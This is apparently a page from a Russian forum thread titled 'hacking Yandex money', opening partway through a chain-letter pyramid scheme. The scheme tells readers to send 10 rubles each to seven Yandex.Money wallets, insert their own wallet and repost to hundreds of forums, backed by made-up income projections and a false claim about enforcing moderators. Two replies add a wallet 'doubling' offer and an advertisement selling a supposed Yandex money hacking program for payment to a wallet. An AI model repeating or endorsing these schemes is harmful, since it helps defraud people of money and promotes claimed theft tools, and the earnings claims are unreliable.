ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ №2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате .txt или ещё как вам удобней). В скопированной статье вычеркните из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий-на место 2-го, 4-ый-на место 3-го, 5-ый-на место 4-го, 6-ой-на место 5-го и 7-й на место 6-го! А в 7-й номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!!
Шаг №3. Разместите эту статью на не менее чем 200 - 300 форумах и новостных лентах (News Groups). Запомните, чем больше Вы разместите, тем выше будет Ваш доход, и этот доход будет напрямую зависеть от Вас. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, гарантирует Вам доход 180 000 руб. - ЭТО МИНИМУМ!!! в течение двух месяцев!!! Больше размещений - больше доход (при том в геометрической прогрессии). ПОМНИТЕ!!! Этот бизнес продолжает существовать и процветать только БЛАГОДАРЯ ЧЕСТНОСТИ И СЕРЬЕЗНОСТИ УЧАСТНИКОВ.
Итак, когда Вы достигнете первой позиции, Вы будете иметь тысячи долларов просто КАК СОЗДАТЕЛЬ СПИСКА!!! Это стоит 70 руб. и совсем нетрудной работы!!! ГЛАВНОЕ ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! Но поработать всё же придется. Необходимо заинтересовать людей. Для этого необходимо воспользоваться рассылкой, размещением объявлений на специализированных сайтах о поисках работы, форумах, досках объявлений. А теперь я Вам объясню, почему Вы в любом случае ничего не теряете, а ТОЛЬКО ВЫИГРЫВАЕТЕ!!! Скажем, из 200 размещений я получу только 5 ответов (очень низкая цифра). Значит, я сделаю 50 рублей, находясь на 7 позиции в списке. Теперь эти 5 людей делают опять же МИНИМУМ 200 размещений с моим кошельком на 6 позиции, и только 5 людей отвечают тем первым 5-и; это уже 250 рублей. Дальше эти 25 людей делают по 200 размещений с моим кошельком на 5 строчке и только 5 отвечают; мой доход 1 250 рублей. Теперь эти 125 людей, разместив и получив только по 5 ответов, дают мне 6 250 рублей прибыли (я на 4 позиции). Дальше смешнее: эти 625 людей делают по минимум 200 размещений со мною на 3 строчке и только 5 людей отвечают; это 31250 рублей. Самое интересное это то, что эти 3 125 людей сделают еще по 200 размещений, ну а если им ответят только 5 людей, то я уже получаю 156 250 рублей (я на 2 позиции). Теперь ВНИМАНИЕ: эти 15 625 людей сделают еще по 200 размещений, им отвечают 5 человек это 781 250 рублей!!!
Не правда ли внушительная цифра? И это всё за первоначальный вклад в 70 рублей !!! Вы себе можете представить, что тысячи людей со всего мира присоединяются к Интернету и читают эти статьи каждый день. Так же как и вы сейчас читаете эту!!!
Так что?
Потратите ли Вы 70 рублей, чтобы узнать работает ли это???
А это действительно работает! Все продумано до мелочей
0
Страница: 1

0

209

вот кошелек 410011120825432
кладешь 150 приходит 300 через минут 5,не лохотрон!
только раз в сутки..!нудновато но подзароботать можно,на игруху хватает)))
пользуйтесь,делится полезно.
можете поблагодарить меня.. 41001891915387

0

210

КОМУ НУЖНА ПРОГРАММА ДЛЯ ВЗЛОМА ЯНДЕКС - ДЕНЕГ..?..СТОИМОСТЬ- 500 р....номер счета - 410011694023955,программу пришлю на ваш Email,который вы подпишите  при отправке денег..и УДАЧИ!!

0

Вы здесь » КАК ЗАРАБОТАТЬ ДЕНЬГИ » Тестовый форум » ВЗЛОМ ЯНДЕКС ДЕНЕГ 100%